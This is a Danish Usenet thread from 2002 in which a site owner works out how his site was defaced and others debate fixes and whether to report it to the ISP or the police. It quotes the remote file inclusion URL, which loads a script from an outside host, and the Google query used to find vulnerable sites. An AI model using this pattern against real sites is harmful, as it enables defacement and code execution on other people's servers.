/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Min Webserver Hacked: Defacement :(
Fra : Michael Andreasen


Dato : 14-09-02 11:42

Her i nat er der så nogle hackere der havde angrebet min webserver og
udskiftet min index.php med deres egen "hacked by ...." side..

Fedt nok..

sshd log viser intet at interesse
ftp loggen viser intet
og i httpd loggen kan jeg ikke umiddelbart finde noget - men kan være lidt
svært at se når serveren har 200K hits i døgnet.

Eneste trøst er at det ikke er lykkedes at ændre mere end den ene side på
det ene domain. Resten af domains er tilsyneladende ikke hackede.

Det er ikke så meget det at de er kommet ind i mit system der generer mig -
mere det faktum at jeg ikke kan se hvordan :(

System: RH7.3
FTP: Pureftpd
apache: 1.3.23 (patched til 1.3.26)
Php 4.1.2 (safe mode m.m. = on)

Linux router firewall med iptables 3xdrop policies - kun alm. porte er åbne
(80,21,ssh) + et par enkelte andre
passwd's der er umulige at gætte sig til

Hvad i alverden gør man så nu?

Jeg skal ikke udelukke at det er min php kode der "stinker" - kan det mon
være tilfældet?

p.s. posted i hhv. dk.edb.sikkerhed & dk.edb.system.unix - håber det er ok.

Mvh
Michael Andreasen



 
 
Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 12:39

"Michael Andreasen" <maskinen2000@hotmail.com> wrote in message
news:alv3pa$5t7$1@sunsite.dk...
> Her i nat er der så nogle hackere der havde angrebet min webserver og
> udskiftet min index.php med deres egen "hacked by ...." side..
>
> Fedt nok..

Så er det aligevel lykkedes mig at finde ud af hvordan de har gjort. Det er
sågar lykkedes mig at downloade hele deres kode der har undnyttet mit
sikkerhedshul. Det viser sig at være fordi jeg i min php kode har noget
include, f.eks. www.domain.dk?include=doc.htm --- så har de simpelthen
skrevet et lille php script som åbner index.php og overskriver den... og
kaldt det med www.domain.dk?include=http://deresscript.php - pi...simpelt,
men ganske effektivt.

---- Jeg har aldrig påstået at jeg var skrap til php - og nu har jeg
ligefrem fået det bevist

Men ikke desto mindre er jeg glad.

1: Jeg ved nu hvordan det er lykkedes dem
2: De har *ikke* haft adgang til serveren, ssh o.s.v. Hvilket er en trøst
3: Jeg har deres ip adresser. og sågar fundet frem til deres hjemmeside med
en 7-8 lignende scripts

Det viser sig at være nogle franskmænd.. Mon det kan betale sig at gøre mere
ved denne sag (udeover at omskrive min kode altså :)

Mvh
Michael Andreasen



Larz (14-09-2002)
Kommentar
Fra : Larz


Dato : 14-09-02 12:50

Michael Andreasen wrote:
> Så er det aligevel lykkedes mig at finde ud af hvordan de har gjort. Det er
> sågar lykkedes mig at downloade hele deres kode der har undnyttet mit
> sikkerhedshul. Det viser sig at være fordi jeg i min php kode har noget
> include, f.eks. www.domain.dk?include=doc.htm --- så har de simpelthen
> skrevet et lille php script som åbner index.php og overskriver den... og
> kaldt det med www.domain.dk?include=http://deresscript.php - pi...simpelt,
> men ganske effektivt.

heheh ;)

> Det viser sig at være nogle franskmænd.. Mon det kan betale sig at gøre mere
> ved denne sag (udeover at omskrive min kode altså :)

Nææh de har jo ikke som sådan hacket dig... De har udnyttet nogle
"features" i dine scripts ;P

Lige en reminder til folk der kører med SSL på deres apache - opgradér
til OpenSSL v0.9.6g - ellers er i åbne for den nye lille orm Slapper...

<http://securityresponse.symantec.com/avcenter/venc/data/linux.slapper.worm.html>

Download 0.9.6g her: <http://www.openssl.org/source/>

--
-
Lars
http://coder.dk/sohofaq.php - Uofficiel WOL SOHO 77 FAQ
http://wshlman.moons.dk/ - Say goodbye to GameSpy
- A Free Half Life Manager!
To mail me remove your pants.


Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 13:28

"Larz" <lp@your-pants.coder.dk> wrote in message
news:YnFg9.74045$ww6.5242629@news010.worldonline.dk...
> Lige en reminder til folk der kører med SSL på deres apache - opgradér
> til OpenSSL v0.9.6g - ellers er i åbne for den nye lille orm Slapper...
>
>
<http://securityresponse.symantec.com/avcenter/venc/data/linux.slapper.worm.
html>
>
> Download 0.9.6g her: <http://www.openssl.org/source/>

Hermed gjort.. Tak for tippet.. Sidder lidt tilbage med en smag i munden af
utilstrækkelighed.. Hvordan er det dog muligt at holde sig opdateret med
alle disse sikkerhedsinfo medmindre man arbejder med det til dagligt
(hvilket jeg ikke gør) - Bryder mig ikke om at man skal stole på RH´s
up2date eller lign løsninger.

Men der er vel intet andet at gøre?

Mvh
Michael



Larz (14-09-2002)
Kommentar
Fra : Larz


Dato : 14-09-02 13:41

Michael Andreasen wrote:
> Hermed gjort.. Tak for tippet.. Sidder lidt tilbage med en smag i munden af
> utilstrækkelighed.. Hvordan er det dog muligt at holde sig opdateret med
> alle disse sikkerhedsinfo medmindre man arbejder med det til dagligt
> (hvilket jeg ikke gør) - Bryder mig ikke om at man skal stole på RH´s
> up2date eller lign løsninger.

Næææh jeg har personligt sat mig for at holde mig up-to-date på en kort
liste af software - resten må jeg finde ud af hen ad vejen...
Lav en HTML side med en liste med links over det du vil holde øje med :)

--
-
Lars
http://coder.dk/sohofaq.php - Uofficiel WOL SOHO 77 FAQ
http://wshlman.moons.dk/ - Say goodbye to GameSpy
- A Free Half Life Manager!
To mail me remove your pants.


Alex Holst (14-09-2002)
Kommentar
Fra : Alex Holst


Dato : 14-09-02 17:58

In dk.edb.sikkerhed Michael Andreasen <maskinen2000@hotmail.com> wrote:
> Hermed gjort.. Tak for tippet.. Sidder lidt tilbage med en smag i munden af
> utilstrækkelighed.. Hvordan er det dog muligt at holde sig opdateret med
> alle disse sikkerhedsinfo medmindre man arbejder med det til dagligt
> (hvilket jeg ikke gør) - Bryder mig ikke om at man skal stole på RH´s
> up2date eller lign løsninger.
>
> Men der er vel intet andet at gøre?

Hvis du ikke har tid til at passe det system du saetter op, maa du jo
tage foelgerne. Alternativet er at fravaelge software som du ikke
strengt taget har brug for. Er PHP f.eks. et absolut krav, eller kunne
du noejes med en flok almindelige dokumenter? Skal du virkeligt bruge
alle modulerne loaded i din Apache? Hvad med de andre services du
koerer; kan du aendre dine vaner og lukke nogen af dem? Soerg ogsaa for
at de services du koerer er sat ordenligt op.

Laes evt. lidt i OSS'en for dk.edb.sikkerhed og spoerg igen:

http://a.area51.dk/sikkerhed/

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

Adam Sjøgren (14-09-2002)
Kommentar
Fra : Adam Sjøgren


Dato : 14-09-02 13:40

On Sat, 14 Sep 2002 14:27:40 +0200, Michael Andreasen wrote:

> Men der er vel intet andet at gøre?

Debian har en mailing-liste hvor sikkerhedsadvarsler og oplysninger om
pakker der lukker hullet udsendes: debian-security-announce
http://www.debian.org/security/

Har RedHat ikke noget tilsvarende?


Mvh.

--
"Ok, so we didn't learn any big lesson. Sue me." Adam Sjøgren
"Live and don't learn, that's us." asjo@koldfront.dk

Claus Rasmussen (14-09-2002)
Kommentar
Fra : Claus Rasmussen


Dato : 14-09-02 14:01

Adam Sjøgren wrote:

> Debian har en mailing-liste hvor sikkerhedsadvarsler og oplysninger om
> pakker der lukker hullet udsendes: debian-security-announce
> http://www.debian.org/security/
>
> Har RedHat ikke noget tilsvarende?

RedHat har RedHat Network og deres up2date kommando. Det virker frem-
ragende. Problemet i det konkrete tilfælde var imidlertid, at OP selv
havde flikket noget kode sammen, som der viste sig at være et hul i.

-Claus


Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 14:08

"Claus Rasmussen" <clr@cc-consult.dk> wrote in message
news:alvbts$pnl$1@sunsite.dk...
> RedHat har RedHat Network og deres up2date kommando. Det virker frem-
> ragende. Problemet i det konkrete tilfælde var imidlertid, at OP selv
> havde flikket noget kode sammen, som der viste sig at være et hul i.
> -Claus

Jeg benytter mig også af up2date, og indtil videre har jeg ikke har haft
noget at klage over, men man sidder vel lidt tilbage med spørgsmålet: Er det
nu også nok? :)

Mvh
Michael



Claus Rasmussen (14-09-2002)
Kommentar
Fra : Claus Rasmussen


Dato : 14-09-02 14:16

Michael Andreasen wrote:

> Jeg benytter mig også af up2date, og indtil videre har jeg ikke har haft
> noget at klage over, men man sidder vel lidt tilbage med spørgsmålet: Er
> det nu også nok? :)

Det er det bedste, du kan gøre. De folk, der sidder og vedligeholder de
pakker, har betydeligt større indsigt i sikkerhed end både du og jeg, og
de laver formentlig ikke andet end at sidde og kigge på bugtraq dagen lang.

-Claus


Kasper Dupont (14-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 14-09-02 14:30

Michael Andreasen wrote:
>
> Så er det aligevel lykkedes mig at finde ud af hvordan de har gjort. Det er
> sågar lykkedes mig at downloade hele deres kode der har undnyttet mit
> sikkerhedshul. Det viser sig at være fordi jeg i min php kode har noget
> include, f.eks. www.domain.dk?include=doc.htm --- så har de simpelthen
> skrevet et lille php script som åbner index.php og overskriver den... og
> kaldt det med www.domain.dk?include=http://deresscript.php - pi...simpelt,
> men ganske effektivt.

Jeg synes det interesante spørgsmål er, om de har udnyttet en
almindeligt forekommende fejl, eller om det er et målrettet
angreb mod din side.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Arne Schwerdtfegger (14-09-2002)
Kommentar
Fra : Arne Schwerdtfegger


Dato : 14-09-02 14:41

Kasper Dupont <kasperd@daimi.au.dk> wrote:
> Jeg synes det interesante spørgsmål er, om de har udnyttet en
> almindeligt forekommende fejl, eller om det er et målrettet
> angreb mod din side.

Den er almindeligt forekommende hos nye php kodere :)
Det hjælper at slå ALLOW_URL_FOPEN fra hvis man alligevel ikke skal bruge
det til noget..

--
Knud

Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 15:01

"Arne Schwerdtfegger" <knud@INVALIDskodliv.dk> wrote in message
news:Xns9289A067A6A48knudINVALIDskodlivdk@212.242.40.196...
> Den er almindeligt forekommende hos nye php kodere :)
> Det hjælper at slå ALLOW_URL_FOPEN fra hvis man alligevel ikke skal bruge
> det til noget..
> Knud

Yep sammen med safe_mod=on så ser det ud til at virke ok.. Men jeg må nok
aligevel hellere skrive mine scripts om :)

Mvh
Michael



Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 15:37

"Arne Schwerdtfegger" <knud@INVALIDskodliv.dk> wrote in message
news:Xns9289A067A6A48knudINVALIDskodlivdk@212.242.40.196...
> Den er almindeligt forekommende hos nye php kodere :)
> Det hjælper at slå ALLOW_URL_FOPEN fra hvis man alligevel ikke skal bruge
> det til noget..

Iøvrigt kan jeg i mine logfiler se hvordan de har fundet frem til min side.
De har simpelthen brugt en søgning på google:

http://www.google.fr/search?q=allinurl:+php+htm&hl=fr&lr=&ie=UTF-8&start=0&s
a=N

Der afslører sider der både har php + htm i url'en Og så har de gået søge
resultaterne systematisk igennem. Jeg er i kontakt med en anden der også fik
site site defacet i nat af samme "hackergruppe" - hans website havde også
brugt denne forkerte php kode fejl.

Mvh
Michael Andreasen



Henrik Stidsen (14-09-2002)
Kommentar
Fra : Henrik Stidsen


Dato : 14-09-02 16:10

"Michael Andreasen" <maskinen2000@hotmail.com> wrote in
news:alv75m$efc$1@sunsite.dk

> Så er det aligevel lykkedes mig at finde ud af hvordan de har
> gjort. Det er sågar lykkedes mig at downloade hele deres kode
> der har undnyttet mit sikkerhedshul. Det viser sig at være fordi
> jeg i min php kode har noget include, f.eks.
> www.domain.dk?include=doc.htm --- så har de simpelthen skrevet
> et lille php script som åbner index.php og overskriver den... og
> kaldt det med www.domain.dk?include=http://deresscript.php -
> pi...simpelt, men ganske effektivt.

Hehe, det sker når man glemmer at overveje sikkerheden i sine scripts
;)

> 1: Jeg ved nu hvordan det er lykkedes dem

Så husker du det til næste gang du koder ikke ? ;)

> 2: De har *ikke* haft adgang til serveren, ssh o.s.v. Hvilket er
> en trøst 3: Jeg har deres ip adresser. og sågar fundet frem til
> deres hjemmeside med en 7-8 lignende scripts

Det er altid godt, så slipper du for at skulle reinstallere hele
skidtet ;)

--
Henrik Stidsen | HS235-DK | Ikke eksisterende samleobjekt/undtagelse
http://min.hjemmeside.er.paa.http.kolon.2-x-skraastreg.hs235.dk/
"These opinions are my own, though for a small fee they
be yours too." -- Dave Haynie

rea721 (14-09-2002)
Kommentar
Fra : rea721


Dato : 14-09-02 16:14

Michael Andreasen wrote:

> Det viser sig at være nogle franskmænd.. Mon det kan betale sig at
> gøre mere ved denne sag (udeover at omskrive min kode altså :)

Måske kan det ikke betale sig...men jeg syntes du skal skrive til deres
udbyder...de har måske andet på samvittigheden.

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.


Klaus Ellegaard (14-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 14-09-02 16:18

"rea721" <leon@721.dk> writes:

>Måske kan det ikke betale sig...men jeg syntes du skal skrive til deres
>udbyder...de har måske andet på samvittigheden.

Udbyderne har vist ikke fået politimæssige beføjelser endnu

Det ville være snedigere at anmelde sagen til politiet - eller
bare at droppe den.

Mvh.
   Klaus.

Peter Brodersen (15-09-2002)
Kommentar
Fra : Peter Brodersen


Dato : 15-09-02 14:20

On Sat, 14 Sep 2002 15:17:40 +0000 (UTC), Klaus Ellegaard
<klaus@ellegaard.dk> wrote:

>>Måske kan det ikke betale sig...men jeg syntes du skal skrive til deres
>>udbyder...de har måske andet på samvittigheden.
>Udbyderne har vist ikke fået politimæssige beføjelser endnu

Det er altså derfor, udbyderne i første omgang har led i
abonnementsbetingelserne angående opførsel i samme forbindelse.

Med andre ord har kunderne overtrådt deres aftale med udbyderen.
Derfor har udbyderen alle muligheder for at træde ind. Det har intet
med at lege politi at gøre, blot at være en ansvarlig udbyder, som kan
finde ud af at forholde sig til aftaleforholdene.

>Det ville være snedigere at anmelde sagen til politiet - eller
>bare at droppe den.

Ligeledes fjollet - i så fald skulle der heller ikke være nogen grund
til at klage, hvis en udbyders kunde fx spammer ved direkte at
kontakte eksterne SMTP-servere? Det vil udbyderen nok heller ikke have
log over.

Pointen er ikke, at en klage skal gøre nogen sommer, men at den skal
bidrage til antallet af klager over personen. Det i sig selv giver
forhåbentligt en indikation hos udbyderen.

Dertil kommer så diverse undtagelser, men uanset om franskmanden er
blevet root'et eller ej, vil en ansvarlig udbyder tage kontakt til
ham.

--
- Peter Brodersen

Peter Makholm (14-09-2002)
Kommentar
Fra : Peter Makholm


Dato : 14-09-02 16:22

Klaus Ellegaard <klaus@ellegaard.dk> writes:

> Udbyderne har vist ikke fået politimæssige beføjelser endnu

Alt efter aftalen mellem udbyderen og forbrugeren kan det at bruge
forbindelsen til at skade andre medfører at udbyderen har ret til at
opsige aftalen, eventuelt endda med øjeblikkelig virkning.

Det har intet med politimæssige beføjelser, nærmere en hvis grad af
aftalefrihed som udbyderen kan påråbe sig.

--
Peter Makholm | I congratulate you. Happy goldfish bowl to you, to
peter@makholm.net | me, to everyone, and may each of you fry in hell
http://hacking.dk | forever
| -- The Dead Past

Klaus Ellegaard (14-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 14-09-02 16:25

Peter Makholm <peter@makholm.net> writes:

>Alt efter aftalen mellem udbyderen og forbrugeren kan det at bruge
>forbindelsen til at skade andre medfører at udbyderen har ret til at
>opsige aftalen, eventuelt endda med øjeblikkelig virkning.

Det er bare en farlig beslutning at tage for udbyderen. Hvad nu
hvis det viser sig, at sporene er forfalskede - og kunden derfor
er uskyldig?

Hvad skal den lukkede (uskyldige) kunde gøre i den situation?

Mvh.
   Klaus.

Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 16:53

"Klaus Ellegaard" <klaus@ellegaard.dk> wrote in message
news:alvkd0$uud$1@katie.ellegaard.dk...
> Det er bare en farlig beslutning at tage for udbyderen. Hvad nu
> hvis det viser sig, at sporene er forfalskede - og kunden derfor
> er uskyldig?
> Hvad skal den lukkede (uskyldige) kunde gøre i den situation?
> Mvh. Klaus.

Kan man forfalske sporene? Jeg mener jo at 2.4+ kernels har noget
ip_spoofing protec halløj.. Uden jeg ved så meget om det dog? Og om det
virker.

Iøvrigt så kan jeg se at

Ipadressen tilhører Wanadoo France
Deres hjemmeside er hosted på Lycos France
De andre sider de hackede er fra Frankrig
Deres initialsøgning var på google.fr

Hvis jeg skal være helt ærlig, så tror jeg ikke de har forfalsket sporene -
det lykkedes mig ret nemt at finde frem til deres hjemmeside hvor de har 7-8
scripts liggende til forskellige former for hacking af hhv. Win+Linux bokse.

Mvh
Michael



Klaus Ellegaard (14-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 14-09-02 17:01

"Michael Andreasen" <maskinen2000@hotmail.com> writes:

>Kan man forfalske sporene? Jeg mener jo at 2.4+ kernels har noget
>ip_spoofing protec halløj.. Uden jeg ved så meget om det dog? Og om det
>virker.

Hvis de har rooted maskinen (hvad de så ikke har i dette tilfælde),
er det jo ingen sag at få ændret logfilerne. Men hvordan skal
udbyderen verificere, at status på maskinen er præcist, som
anmelderen siger? Skal de sende en mand til Danmark og undersøge
den - eller stole blindt på anmeldelsen?

>Hvis jeg skal være helt ærlig, så tror jeg ikke de har forfalsket sporene -
>det lykkedes mig ret nemt at finde frem til deres hjemmeside hvor de har 7-8
>scripts liggende til forskellige former for hacking af hhv. Win+Linux bokse.

Det har securityfocus.com også. Så hvis en hacker forfalsker en
logfil, så det er securityfocus.com's ip-range, der står som
hacker, skal securityfocus.com vel også lukkes ned straks?

Eller hur?

(Erstat selv securityfocus.com med en anden - måske privatperson
- der har scripts liggende i legitim sammenhæng)

Mvh.
   Klaus.

Kent Friis (14-09-2002)
Kommentar
Fra : Kent Friis


Dato : 14-09-02 18:06

Den Sat, 14 Sep 2002 17:53:06 +0200 skrev Michael Andreasen:
>"Klaus Ellegaard" <klaus@ellegaard.dk> wrote in message
>news:alvkd0$uud$1@katie.ellegaard.dk...
>> Det er bare en farlig beslutning at tage for udbyderen. Hvad nu
>> hvis det viser sig, at sporene er forfalskede - og kunden derfor
>> er uskyldig?
>> Hvad skal den lukkede (uskyldige) kunde gøre i den situation?
>> Mvh. Klaus.
>
>Kan man forfalske sporene? Jeg mener jo at 2.4+ kernels har noget
>ip_spoofing protec halløj.. Uden jeg ved så meget om det dog? Og om det
>virker.

Hvad hvis den maskine der står i din log-vil bare var den første de
fik overtaget, og de så har brugt den til at arbejde videre fra?

>Hvis jeg skal være helt ærlig, så tror jeg ikke de har forfalsket sporene -
>det lykkedes mig ret nemt at finde frem til deres hjemmeside hvor de har 7-8
>scripts liggende til forskellige former for hacking af hhv. Win+Linux bokse.

Og du har lige fortalt hvor nemt de havde ved at lægge ting på din
hjemmeside...

Mvh
Kent
--
If you think about it, Windows XP is actually the OS that
started as "Microsoft OS/2 NT 3.0"

Michael Andreasen (14-09-2002)
Kommentar
Fra : Michael Andreasen


Dato : 14-09-02 18:29

"Kent Friis" <leeloo@phreaker.net> wrote in message
news:alvq9s$361$2@sunsite.dk...
> Og du har lige fortalt hvor nemt de havde ved at lægge ting på din
> hjemmeside...

Ja - et php kodnings fejl som er blevet rettet nu! :æ]

Mvh
Michael



Kim Hansen (14-09-2002)
Kommentar
Fra : Kim Hansen


Dato : 14-09-02 16:54

Klaus Ellegaard <klaus@ellegaard.dk> writes:

> Det er bare en farlig beslutning at tage for udbyderen. Hvad nu
> hvis det viser sig, at sporene er forfalskede - og kunden derfor
> er uskyldig?

Udbydere er ikke interesseret i at skaffe sig af med uskyldige kunder,
så de sørger nok for at samle et par anmeldelser op, som evt. kan
verificeres vha. af egne log-filer før de reagere.

Jeg synes klart det bør anmeldes til udbyderen, de er nok de eneste
der gider tage sig tid til at skrive et enkelt defacement ned, og de
kan så reagere hvis der kommer flere klager over den samme kunde.

--
Kim Hansen | |\ _,,,---,,_ | Det er ikke
Dalslandsgade 8, A708 | /,`.-'`' -. ;-;;,_ | Jeopardy.
2300 København S | |,4- ) )-,_. ,\ ( `'-' | Svar _efter_
Phone: 32 88 60 86 | '---''(_/--' `-'\_) | spørgsmålet.

Kim Hansen (14-09-2002)
Kommentar
Fra : Kim Hansen


Dato : 14-09-02 17:00


Hov, jeg kom til at lave en FUT uden at jeg var klar over det, det må
I undskylde.

FUT: dk.snak.off-topic

--
Kim Hansen | |\ _,,,---,,_ | Det er ikke
Dalslandsgade 8, A708 | /,`.-'`' -. ;-;;,_ | Jeopardy.
2300 København S | |,4- ) )-,_. ,\ ( `'-' | Svar _efter_
Phone: 32 88 60 86 | '---''(_/--' `-'\_) | spørgsmålet.

Klaus Ellegaard (14-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 14-09-02 16:58

Kim Hansen <k-tahf.qvxh@oek.dk> writes:

>Udbydere er ikke interesseret i at skaffe sig af med uskyldige kunder,
>så de sørger nok for at samle et par anmeldelser op, som evt. kan
>verificeres vha. af egne log-filer før de reagere.

Hvad har udbyderen af logfiler i den sammenhæng?

Og hvis det så alligevel viser sig at være forkert - hvem betaler
så erstatningen til den uskyldige kunde (hvis kunden ellers kan
dokumentere et tab)?

Eller hvad nu hvis fem-ti mennesker bliver sur på en elelr anden
og skriver fem-ti falske anmeldelser? Så har udbyderen jo masser
af dokumentation, og så skal kunden da lukkes med det samme. Og
hvis kunden nægter, kan det jo ikke passe, for der er jo fem-ti
anmeldelser.

Eller hur?

Mvh.
   Klaus.

rea721 (14-09-2002)
Kommentar
Fra : rea721


Dato : 14-09-02 17:42

Klaus Ellegaard wrote:

> Hvad har udbyderen af logfiler i den sammenhæng?

Formentlig en masse, men hvad ved jeg om det.

> Og hvis det så alligevel viser sig at være forkert - hvem betaler
> så erstatningen til den uskyldige kunde (hvis kunden ellers kan
> dokumentere et tab)?

Hvad nu hvis det var sandt?

> Eller hvad nu hvis fem-ti mennesker bliver sur på en elelr anden
> og skriver fem-ti falske anmeldelser? Så har udbyderen jo masser
> af dokumentation, og så skal kunden da lukkes med det samme. Og
> hvis kunden nægter, kan det jo ikke passe, for der er jo fem-ti
> anmeldelser.

Det står en hver frit at klage til en udbyder.. det er så op til udbyderen
at afgøre hvad der skal ske mer i sagen, hvis noget overhovedet. Hvis
udbyderen afbryder kundeforholdet, er det en sag mellem Isp'en og kunden.

Jeg ved egentlig ikke hvad du argumentere for eller imod... mener du man
bare skal lade stå til eller?

Vi er vist OT nu... fel free to Fut

--
Rea721 AKA Leon Andrea leon@721.dk http://721.dk
Bevar Eskadrille 721 på Flyvestation Værløse
Den sidste operative Flyvestation på Sjælland.



Klaus Ellegaard (14-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 14-09-02 18:50

"rea721" <leon@721.dk> writes:

>Jeg ved egentlig ikke hvad du argumentere for eller imod... mener du man
>bare skal lade stå til eller?

Jeg mener, man skal anmelde til dem, der kan gøre noget ved
sagen.

Hvis vi snakker overtrædelser af abonnementsbetingelserne,
skal man anmelde til udbyderen.

Hvis vi snakker kriminalitet (herunder hacking), skal man
anmelde til politiet.

Der står godt nok i de fleste udbyderes abonnementsbetingelser,
at abonnementet ikke må bruges til kriminelle aktiviter. Men
den eneste myndighed, der kan undersøge den sag, er politiet.

Mvh.
   Klaus.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 02:08

Klaus Ellegaard wrote:
>
> Der står godt nok i de fleste udbyderes abonnementsbetingelser,
> at abonnementet ikke må bruges til kriminelle aktiviter. Men
> den eneste myndighed, der kan undersøge den sag, er politiet.

Mener du ikke: Den eneste myndighed, der MÅ undersøge den
sag, er politiet?

Der er da ingen tvivl om, at udbyderen KAN undersøge sagen,
spørgsmålet er om de MÅ.

Og KAN politiet rent faktisk undersøge sagen uden udbyderens
hjælp?

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 08:31

Kasper Dupont <kasperd@daimi.au.dk> writes:

>> Der står godt nok i de fleste udbyderes abonnementsbetingelser,
>> at abonnementet ikke må bruges til kriminelle aktiviter. Men
>> den eneste myndighed, der kan undersøge den sag, er politiet.

>Mener du ikke: Den eneste myndighed, der MÅ undersøge den
>sag, er politiet?

Jo - "må" er mere rigtigt.

>Og KAN politiet rent faktisk undersøge sagen uden udbyderens
>hjælp?

Nogle gange kan de - andre gange beder de om hjælp. Dansk politi
er faktisk rigtig dygtige til den slags.

Mvh.
   Klaus.

Kent Friis (15-09-2002)
Kommentar
Fra : Kent Friis


Dato : 15-09-02 09:38

Den Sun, 15 Sep 2002 07:30:31 +0000 (UTC) skrev Klaus Ellegaard:
>Kasper Dupont <kasperd@daimi.au.dk> writes:
>
>>> Der står godt nok i de fleste udbyderes abonnementsbetingelser,
>>> at abonnementet ikke må bruges til kriminelle aktiviter. Men
>>> den eneste myndighed, der kan undersøge den sag, er politiet.
>
>>Mener du ikke: Den eneste myndighed, der MÅ undersøge den
>>sag, er politiet?
>
>Jo - "må" er mere rigtigt.
>
>>Og KAN politiet rent faktisk undersøge sagen uden udbyderens
>>hjælp?
>
>Nogle gange kan de - andre gange beder de om hjælp. Dansk politi
>er faktisk rigtig dygtige til den slags.

Personlig erfaring?

Det har da været fremme at en person fik konfiskeret sin computer i
månedsvis, fordi han var blevet meldt for portscanning. Det eneste han
havde gjort, var at lave en tastefejl i et ip-nummer, så han ramte en
ftp-server hos et firma der ikke anede noget om sikkerhed i stedet for
kammaratens ftp-server. Så:

1. Portscanning er så vidt vides ikke ulovligt.
2. Det hedder ikke portscanning sålænge det kun drejer sig om en enkelt
port (hvor mange servere har du "portscannet" på port 80 idag?)
3. "forkert nummer" kan ske for hvem som helst, det er da ikke noget
man laver en sag ud af.

Efter den sag, vil jeg til hver en tid foretrække at tage fat i ISP'en,
og lade dem foretage efterforskning, så kan de kontakte politiet hvis
de mener at sagen har noget på sig. De ved da i det mindste hvad de har
med at gøre.

Mvh
Kent
--
You haven't seen _multitasking_ until you've seen Doom and
Quake run side by side

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 10:15

leeloo@phreaker.net (Kent Friis) writes:

>>Nogle gange kan de - andre gange beder de om hjælp. Dansk politi
>>er faktisk rigtig dygtige til den slags.

>Personlig erfaring?

Jep.

>Det har da været fremme at en person fik konfiskeret sin computer i
>månedsvis, fordi han var blevet meldt for portscanning.

Mon ikke det er ved at være længe siden? Det har jo også været et
nyt område for politiet engang.

>Efter den sag, vil jeg til hver en tid foretrække at tage fat i ISP'en,
>og lade dem foretage efterforskning, så kan de kontakte politiet hvis
>de mener at sagen har noget på sig. De ved da i det mindste hvad de har
>med at gøre.

Nu er portscanninger ikke åbenlyst kriminelt, og jeg tror ikke, en
udbyder på noget tidspunkt vil melde en kunde til politiet på vegne
af en klager.

Langt de fleste portscanninger foretages i øvrigt ikke med vilje.
Det er oftest orme og den slags, der gør det, uden at kunden er
klar over det. Så politiet har intet at gøre i langt hovedparten
af de sager - simpelthen fordi der intet ulovligt er sket (udover
at selve ormen nok ikke er lovlig).

Mvh.
   Klaus.

Andreas Plesner Jaco~ (15-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 15-09-02 10:20

In article <am1j31$mro$1@katie.ellegaard.dk>, Klaus Ellegaard wrote:
>
>>Det har da været fremme at en person fik konfiskeret sin computer i
>>månedsvis, fordi han var blevet meldt for portscanning.
>
> Mon ikke det er ved at være længe siden? Det har jo også været et
> nyt område for politiet engang.

Jeg mener at have hørt at de tilfælde hvor det går så galt er fordi der
er en lokal sheriff indblandet, der ikke vil blande rigspolitiet ind i
det, og det er jo der expertisen ligger.

--
Andreas Plesner Jacobsen | Drilling for oil is boring.

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 10:24

Andreas Plesner Jacobsen <apj@daarligstil.dk> writes:

>Jeg mener at have hørt at de tilfælde hvor det går så galt er fordi der
>er en lokal sheriff indblandet, der ikke vil blande rigspolitiet ind i
>det, og det er jo der expertisen ligger.

Mjah, det er jo ikke så heldigt. Men det rygtes forhåbentlig ret
hurtigt kredsene imellem, at man kan komme til at se temmelig
fjoget ud, hvis man selv prøver på den slags

IT-sektionen i Rigspolitiets NEC er der bestemt ikke noget galt
med rent kvalifikationsmæssigt. Og hvis det endelig kniber, ved
de, hvem de skal ringe til. Så kan det vist ikke blive meget
mere professionelt.

Mvh.
   Klaus.

Thomas Strandtoft (15-09-2002)
Kommentar
Fra : Thomas Strandtoft


Dato : 15-09-02 11:25

Kasper Dupont wrote:

> > Der står godt nok i de fleste udbyderes abonnementsbetingelser,
> > at abonnementet ikke må bruges til kriminelle aktiviter. Men
> > den eneste myndighed, der kan undersøge den sag, er politiet.
>
> Mener du ikke: Den eneste myndighed, der MÅ undersøge den
> sag, er politiet?
>
> Der er da ingen tvivl om, at udbyderen KAN undersøge sagen,
> spørgsmålet er om de MÅ.

Hvorfor skulle de ikke måtte det?

Tænkt eksempel: Jeg udlejer garager til et boligkompleks, man kan
sige at jeg er Garage Service Provider. Jeg har en del kunder der
må benytte garagen. En dag hører jeg noget fra garagen. Må jeg
undersøge om det er en af garagens retsmæssige brugere der støjer?
Om vedkommende laver noget ved sin egen bil eller ulovligt roder
ved en andens bil? Er det kun politiet der må undersøge om der
